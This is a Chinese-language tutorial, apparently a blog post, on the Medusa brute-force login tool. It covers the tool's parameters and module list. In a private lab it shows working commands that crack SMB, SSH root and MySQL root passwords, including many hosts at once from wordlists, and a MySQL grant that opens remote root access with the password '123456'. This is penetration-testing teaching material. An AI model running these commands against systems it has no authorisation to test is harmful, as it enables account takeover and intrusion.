1.1 medusa介绍
medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是medusa的稳定性相较于hydra要好很多,但是支持的模块相对于hydra少一些,其中Kali Linux中自带medusa。
1.2 medusa使用
1.2.1 下载medusa
https://github.com/jmk-foofus/medusa/
http://foofus.net/goons/jmk/medusa/medusa.html
1.2.2 medusa参数解释
-h [TEXT]:目标IP -u [TEXT]:用户名 -P [FILE]:密码文件 -e [n/s/ns]:n意为空密码,s意为密码与用户名相同 -M [TEXT]:模块执行名称 -t [NUM]:设定线程数量 -F:破解到一个正确的密码即退出 -H [FILE]:目标主机文件 -U [FILE]:用户名文件 -p [TEXT]:密码 -C [FILE]:组合条目文件 -O [FILE]:文件日志信息 -m [TEXT]:传递参数到模块 -d:显示所有的模块名称 -n [NUM]:使用非默认端口 -s:启用SSL -r [NUM]:重试间隔时间,默认为3秒 -L:并行化,每个用户使用一个线程 -f:在任何主机上找到第一个账号/密码后停止破解 -q:显示模块的使用信息 -v [NUM]:详细级别(0-6) -w [NUM]:错误调试级别(0-10) -V:显示版本 -Z [TEXT]:继续扫描上一次
1.2.3 medusa所有模块
# medusa -d cvs.mod : Brute force module for CVS sessions : version 2.0 ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1 http.mod : Brute force module for HTTP : version 2.1 imap.mod : Brute force module for IMAP sessions : version 2.0 mssql.mod : Brute force module for M$-SQL sessions : version 2.0 mysql.mod : Brute force module for MySQL sessions : version 2.0 nntp.mod : Brute force module for NNTP sessions : version 2.0 pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0 pop3.mod : Brute force module for POP3 sessions : version 2.0 postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 rexec.mod : Brute force module for REXEC sessions : version 2.0 rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 rsh.mod : Brute force module for RSH sessions : version 2.0 smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1 smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1 smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0 snmp.mod : Brute force module for SNMP Community Strings : version 2.1 ssh.mod : Brute force module for SSH v2 sessions : version 2.1 svn.mod : Brute force module for Subversion sessions : version 2.1 telnet.mod : Brute force module for telnet sessions : version 2.0 vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0 vnc.mod : Brute force module for VNC sessions : version 2.1 web-form.mod : Brute force module for web forms : version 2.1 wrapper.mod : Generic Wrapper Module : version 2.0
1.3 实验环境
序号 | 主机IP | 主机系统 | 主机角色 |
1 | 192.168.10.180 | Kali | 攻击机 |
2 | 192.168.10.129 | Windows 10 64位 | 攻击机 |
3 | 192.168.10.156 | Windows 7 32位 | 被攻击机 |
4 | 192.168.10.80 | Centos 7 64位 | 被攻击机 |
1.4 实例:使用medusa破解系统用户名密码
1.4.1 破解win7文件共享密码
1.4.1.1 前期准备
1.4.1.2 破解smb文件密码
# medusa -M smbnt -h 192.168.10.157 -e ns -F -u pm -P m.txt

1.4.2 破解ssh服务root密码
1.4.2.1 前期准备
1.4.2.2 破解ssh远程密码
# medusa -M ssh -h 192.168.10.80 -e ns -F -u root -P m.txt

1.4.3 同时破解多台主机
host.txt文件中是目标主机名称或者IP地址,user.txt文件中指定需要暴力破解的用户名,字典使用"m.txt" ,使用8000进程同时暴力破解:
1.4.3.1 准备环境
# for i in {1..254};do echo "192.168.10.${i}" >> host.txt;done # vim host.txt 192.168.10.156 192.168.10.157 192.168.10.80 # vim user.txt pm root administrator
1.4.3.2 进行暴力破解
# medusa -M smbnt -H ./host.txt -U ./user.txt -P m.txt -t 8 -O ./smbnt.log # cat smbnt.log

1.4.4 破解mysql的root密码
1.4.4.1 准备环境
[root@test ~]# mysql -uroot –p123456 mysql> grant all on *.* to 'root'@'%' identified by '123456' with grant option;
1.4.4.2 进行暴力破解
# medusa -M mysql -h 192.168.10.80 -e ns -F -u root -P m.txt


我的微信
如果有技术上的问题可以扫一扫我的微信